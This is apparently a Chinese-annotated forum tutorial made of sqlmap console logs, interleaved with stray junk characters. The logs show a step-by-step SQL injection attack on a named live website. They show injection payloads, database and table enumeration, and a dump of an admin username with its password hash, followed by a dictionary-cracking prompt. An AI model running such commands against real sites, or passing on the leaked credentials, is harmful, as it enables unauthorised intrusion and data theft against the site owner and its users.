D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: o$ l+ b2 @" B, b' Z, S
ms "Mysql" --current-user /* 注解:获取当前用户名称
4 X, p J. T2 I0 w8 i sqlmap/0.9 - automatic SQL injection and database takeover tool% U2 A5 Q% D* l1 r/ D9 i/ N, \3 W
http://sqlmap.sourceforge.net starting at: 16:53:54
9 S& I/ W+ T9 @& }! `[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
; y4 b6 ~3 S+ H8 i- N% q session file+ @' H9 t2 ]# K2 t' G
[16:53:54] [INFO] resuming injection data from session file M6 ~, D5 u& l: W l
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file2 A; g- x1 A) N2 O! y3 U
[16:53:54] [INFO] testing connection to the target url' C" z; G* [$ [
sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 Y6 a; M! n3 J
sts:
1 r( D3 {5 r2 t2 ^# v; ^! g6 P---; l7 ~; P7 ~5 p
Place: GET/ G% O' t* i: e: m
Parameter: id* C, T$ ~* B" N6 T4 s
Type: boolean-based blind
( Z, m4 i; \6 G Title: AND boolean-based blind - WHERE or HAVING clause
# V+ k; _' f/ n Payload: id=276 AND 799=799$ ~2 V" Y" ]* H1 e5 z4 n+ O1 g3 @
Type: error-based# V: g3 q# [8 u* t( G0 ?6 {& O7 B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ k" ?" R7 @0 r3 J# w! H5 K+ k Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) C( J9 j5 A4 W6 d" }
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ m6 J" t# _/ q$ k5 o. h
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! M# J' C. F7 R. m! A1 D Type: UNION query
1 I, T$ }& e1 Z Title: MySQL UNION query (NULL) - 1 to 10 columns' F X; ^' T3 t3 |+ o _1 s
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( u5 I1 J; @1 E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 W4 k7 ^ J2 n( D/ a& ]
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# I/ u* M& B8 @3 p
Type: AND/OR time-based blind e1 C5 a- F2 X9 ], S0 t
Title: MySQL > 5.0.11 AND time-based blind
- k p8 ] o y9 x2 `; w# V' t" N Payload: id=276 AND SLEEP(5)4 m' a: S2 B2 x4 g& k4 a
---* B7 K+ _2 j1 t1 F/ ?9 p6 {
[16:53:55] [INFO] the back-end DBMS is MySQL) R+ R5 e% W$ m+ t$ l/ \
web server operating system: Windows
J& `" u5 Y, f( nweb application technology: Apache 2.2.11, PHP 5.3.0# P& A$ E7 M" _5 ]+ R
back-end DBMS: MySQL 5.0
6 y$ ^; H2 D% Z r2 n( L& [- W[16:53:55] [INFO] fetching current user
3 W8 K' a, k( i Tcurrent user: 'root@localhost' 3 ^' G5 n+ D" P& J
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 R9 X) U. _1 J. n3 x7 atput\www.wepost.com.hk' shutting down at: 16:53:58
2 L+ J* g+ W# O: x O$ x, g. p3 K! u8 Y+ D5 A4 c+ q" f
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& [% Z3 |; c+ |# L: g6 H4 k
ms "Mysql" --current-db /*当前数据库+ e' J D8 k2 j
sqlmap/0.9 - automatic SQL injection and database takeover tool
2 b8 }2 [9 O+ G" D4 S" n http://sqlmap.sourceforge.net starting at: 16:54:16+ l# x6 J5 z1 l
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ }" ~' z) q" ~& C( E5 ~. C* ^' M
session file
/ }( G' d% u O; k% W6 s[16:54:16] [INFO] resuming injection data from session file
. j! u+ J/ u" _4 z[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
+ N! k2 Q l- [/ ~( Z[16:54:16] [INFO] testing connection to the target url
7 k% b I9 J" A1 {sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 c) T% {* c& ]3 r* Z: C
sts:+ S' K& Z4 @' i: D0 V
--- {* X4 q/ w. u
Place: GET' B S4 w2 b: A, Q
Parameter: id
3 E/ \2 m. ] n8 F Type: boolean-based blind* d% U1 |- w2 k! o/ D
Title: AND boolean-based blind - WHERE or HAVING clause
& \! ^+ N0 ^7 U: A- z |: c4 b9 L' U Payload: id=276 AND 799=799# K7 v$ ]9 O9 M! l4 r
Type: error-based5 z5 X7 i4 {( {3 J R* \0 ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 i; ~: S! O Y7 P Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 j4 b5 N3 _# x' I$ z5 [7 t& {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 a5 k+ Q S# U6 D! ?- K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; o$ t7 p8 K. G1 [ p5 A0 u Type: UNION query
1 R% N: j4 U" [3 a Title: MySQL UNION query (NULL) - 1 to 10 columns
; { m, U" B8 H# H8 ]4 } Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! Q- M. q* \6 W+ E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 q- u! b7 B$ ^3 V; A# |9 q* E
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' r0 h9 p w7 ]3 B( o Type: AND/OR time-based blind
& @+ E1 Z9 b# {% O Title: MySQL > 5.0.11 AND time-based blind, E* ?, }, l( f3 C" f6 ]
Payload: id=276 AND SLEEP(5)
% l# W2 g5 a% ^; E4 S$ z5 q---8 F; s5 J# c; [% u0 G; ^! P
[16:54:17] [INFO] the back-end DBMS is MySQL
. O, ?2 }" h4 y4 Y0 U. Jweb server operating system: Windows5 j: Y' ^& M; O: j9 }/ \6 e3 w
web application technology: Apache 2.2.11, PHP 5.3.01 _0 M; @; s: K8 r1 t; K
back-end DBMS: MySQL 5.04 f8 g- [! R" D, [9 A
[16:54:17] [INFO] fetching current database
- v) @/ _' ]0 p9 K8 Ecurrent database: 'wepost'
" ^" Q- w* A% Q' g5 f8 _4 b[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ l% y3 x. p, k; }1 ctput\www.wepost.com.hk' shutting down at: 16:54:186 d* r1 Q3 M6 M7 v9 y/ d
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 A2 [7 X# ]6 r/ l2 L: k& d
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
3 H# w/ k y: p5 |" H sqlmap/0.9 - automatic SQL injection and database takeover tool
6 X4 [. U. @* Y$ U0 o- h! i http://sqlmap.sourceforge.net starting at: 16:55:25
; j% p/ ]1 u8 Z5 h+ V0 m* `[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( p, b% P8 @# W! q+ s. E( E* O session file
. Z8 c' O3 w6 W5 X2 T[16:55:25] [INFO] resuming injection data from session file' L3 y8 \+ u: V" r: A3 |4 q6 C
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! A$ a0 K3 \: g& a$ |' w
[16:55:25] [INFO] testing connection to the target url. Z" M) z# U9 o. z) J
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 }* W c4 w) F9 B4 T: |0 k. t0 x
sts:
$ ^$ c% ?2 _& S8 D- a _; s---
1 p6 g2 V. K3 o* \4 l$ L8 ^Place: GET
5 I5 P2 C \* W0 |% x0 Y% P1 nParameter: id
3 H! R( B3 p8 [+ h, O Type: boolean-based blind
+ M( U& i0 e: W z5 v m Title: AND boolean-based blind - WHERE or HAVING clause
$ f9 j. ]2 T9 x( m/ }8 e! q' E Payload: id=276 AND 799=799
5 P; n0 O. ~+ M Type: error-based
6 @- R1 S( o9 q Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) ]2 \; k8 r: u* ^
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: j# v4 t- ]9 {) E4 o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 Z1 Z- q, O1 c4 n
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 Y9 ~7 S, E+ ], M4 A8 x) e/ Q% H
Type: UNION query; u) e2 ]+ J4 G3 h# t6 N2 Y
Title: MySQL UNION query (NULL) - 1 to 10 columns- h! C, e- P2 \) O1 c
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( ~. U- T' V; W$ Y3 K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- x& V: {5 k4 h: I3 e% pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 p( y( K" }. L: g9 b0 E Type: AND/OR time-based blind# i/ {' J, c: o% c6 o# ~- \ _
Title: MySQL > 5.0.11 AND time-based blind4 ` \5 n$ d! W8 @5 y0 `. v# \1 p
Payload: id=276 AND SLEEP(5)) z# n- d, F/ Z4 x6 U) z
---
0 K% S/ Q5 E- I' c[16:55:26] [INFO] the back-end DBMS is MySQL
/ \. X: H8 ]6 F. kweb server operating system: Windows3 f9 x3 a' B' x8 X
web application technology: Apache 2.2.11, PHP 5.3.0: a m! @- l. |9 u- O
back-end DBMS: MySQL 5.04 R# ?% ]# V' `* s' X3 p( \
[16:55:26] [INFO] fetching tables for database 'wepost'+ p- g" E4 ~2 e+ `9 j1 M
[16:55:27] [INFO] the SQL query used returns 6 entries7 ]4 e2 k& A/ s
Database: wepost; H! f+ b6 Q/ H# O& H7 D! n* ]
[6 tables]
1 b1 K- q! j9 x- }8 U+-------------+. _0 K# j5 P' i; i$ P' J: V, I
| admin |
+ P" a$ o$ m4 t+ h7 u7 g* K| article |) x, e8 o0 k4 W2 j8 \
| contributor |$ l2 F: O" t$ l1 [
| idea |' u* f# h2 c5 B4 w+ d
| image |
% g) C, o" Q* M( O| issue |3 e i* `; y! E$ s
+-------------+* i0 u: f5 a5 W( m( V' ^
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' ?$ M) C' U& X: P5 X& z
tput\www.wepost.com.hk' shutting down at: 16:55:33% X! s& t: y1 v! t2 Y' |
" x ~1 V2 `- g" o+ ?D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 w, G7 }* J- _% h. z4 k8 w
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
9 {, V( h; J6 _* O; r% h& q; C sqlmap/0.9 - automatic SQL injection and database takeover tool2 K0 _8 F4 G/ B# H* h& v: t9 z9 a
http://sqlmap.sourceforge.net starting at: 16:56:06' W9 C, ]" X) V/ T& E# I
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: Q Q/ ?7 w4 c9 e/ e( gsts:
* D9 y( C2 Y3 |7 C+ i---
& k% L F" H% `6 h) `( O7 H \4 NPlace: GET( \1 }) g/ K- s F
Parameter: id6 z; t5 l5 c( j' L5 F
Type: boolean-based blind
4 A+ D% y8 [, F# m$ s% w Title: AND boolean-based blind - WHERE or HAVING clause' Y9 L5 \8 ]4 f3 |7 Z
Payload: id=276 AND 799=799$ k( u8 A M; [- A1 B3 p3 G$ _4 O; K/ p
Type: error-based
: |, p" L2 ]% o2 J( z8 ~0 } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# ?* p/ W& j2 y0 c8 |& P2 Y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
Z9 B w% g7 A) w4 S, ^+ U/ m120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) B# G% R- F& U3 e [: e/ v% ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 j6 V: u2 {! {, m4 J0 @ Type: UNION query* r+ e, g& @. {7 T4 `, f+ w
Title: MySQL UNION query (NULL) - 1 to 10 columns
. \2 n: [+ j2 c' a2 ^1 P' [. k Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
1 L0 l# K. b- C) a(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 D" k* J3 A# \8 GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ }" u6 f# w+ }7 y
Type: AND/OR time-based blind/ G/ _! {+ v0 ^/ v7 x5 l& N
Title: MySQL > 5.0.11 AND time-based blind
+ X F! U7 \( w Payload: id=276 AND SLEEP(5)! W5 A3 h# k7 ]4 I- `7 M" d: H
---
: c* R4 p. l6 o8 B3 l- Wweb server operating system: Windows7 C$ ]7 j8 ~+ e' P9 e
web application technology: Apache 2.2.11, PHP 5.3.0% N6 f3 `5 g" d, X8 ^5 e3 g/ M8 e' c2 w
back-end DBMS: MySQL 5.08 ^$ x3 S$ ?8 V) W1 Z0 Y/ B
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se1 T/ T }; L- Q% ?- Z3 g9 l& k; S
ssion': wepost, wepost0 f) H% m" x1 i
Database: wepost( M% G6 `6 h0 y/ K; }, K a
Table: admin
/ u0 r a1 Q+ r, q4 |[4 columns]
; |* Z( [9 H" }+----------+-------------+1 n& ], t" O' r! }
| Column | Type |
7 B$ C* X# J* `0 |7 `+----------+-------------+& J4 m) y5 h' R3 n
| id | int(11) |
3 J8 s& F3 r, f5 x5 z- z| password | varchar(32) |
, }: Y4 i. k1 S4 X( Q* `. N$ w+ b| type | varchar(10) |; a4 x, ], R+ R* e- X3 t4 Y
| userid | varchar(20) |& i* T$ A+ h/ [6 p. S/ d* J/ @& M0 T
+----------+-------------+
/ j* m, l% E; ]; f, {& P3 r shutting down at: 16:56:19
* P8 y9 n A9 Y1 W' {" b' z1 o) Y2 d# h8 k$ T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* R( j8 Z* ]# u- Q4 Ums "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容 k7 e: C: \( `7 q0 w1 F6 Q, k* v
sqlmap/0.9 - automatic SQL injection and database takeover tool
+ ^- g9 k5 m9 ?; c3 H http://sqlmap.sourceforge.net starting at: 16:57:14, y- o* X4 y e8 l. o0 L
sqlmap identified the following injection points with a total of 0 HTTP(s) reque, _4 d- _, y. S" C4 u4 c. F
sts:
' {0 _. r4 ] |0 ^---
: I7 K" O$ P8 m( L& k+ u5 s' _Place: GET
" q! N$ y, [. U+ {1 ~- t; ]Parameter: id
3 N: l, _% j n2 H& b+ G9 E Type: boolean-based blind. j4 F j0 Y! w( A2 G# [, A( A/ G
Title: AND boolean-based blind - WHERE or HAVING clause9 S% E% }4 T! b/ d# g6 L4 z% {
Payload: id=276 AND 799=7998 g4 ?7 s6 [* F5 L* c" d/ K
Type: error-based' Y$ J3 e( C! V! p5 z4 R* t( V
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* _( n! a' @2 ?( j
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# T4 w% @' O# B% a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) @0 s% p+ s3 O) ~, x4 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 h$ @4 f; P0 i$ m9 h, c9 F
Type: UNION query3 A7 j1 e8 [4 K2 [2 J, Q
Title: MySQL UNION query (NULL) - 1 to 10 columns8 ~+ [+ o8 C- Z5 R, d" w8 L4 _7 L
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 P" ~% }3 p/ ~7 G(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, n; t3 ]' w5 p1 d) j. { o! X9 h
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 Q; K+ `! `$ F4 l0 l0 A Type: AND/OR time-based blind
t2 I/ S3 W I, h0 H2 l5 P Title: MySQL > 5.0.11 AND time-based blind3 s; J" l1 C5 T+ I) |7 H0 O$ v
Payload: id=276 AND SLEEP(5)
9 U- ~3 [, H. E1 n0 l7 x2 d---
# E: [& O; z1 G& e/ H7 b, N# R Kweb server operating system: Windows
# I; }, W0 X2 {' S6 Lweb application technology: Apache 2.2.11, PHP 5.3.0. G- |/ V0 p3 x a3 _& p
back-end DBMS: MySQL 5.0/ b$ V0 l- G9 P) a! c1 v
recognized possible password hash values. do you want to use dictionary attack o0 D2 [0 z6 G- x7 Y7 V
n retrieved table items? [Y/n/q] y
. i0 w( `4 c' swhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]" U' @8 y) z/ ^5 f" E% U' V4 H
do you want to use common password suffixes? (slow!) [y/N] y+ t0 |' Z, ]) D0 o' ]
Database: wepost5 f0 @# O7 x. p5 f+ |
Table: admin* y$ p6 {: U: q; z2 u4 ]; G/ z# t+ N
[1 entry], v( [) e; J( L, R; ]" S
+----------------------------------+------------+
) i( `9 s! E: @5 s L. N: h| password | userid |
' e. C h$ T p% r; u7 r( C+----------------------------------+------------+
: Z/ P4 q* w( ^( ^& A/ }- L7 L| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |$ {5 F7 p/ i, b/ v6 P [" d) l3 B8 d
+----------------------------------+------------+' ~, o0 \& N" k. V: d
shutting down at: 16:58:14
6 Y- X7 L3 W0 [% t2 P9 s
3 u( k4 }3 q! }2 o2 q* W ?D:\Python27\sqlmap> |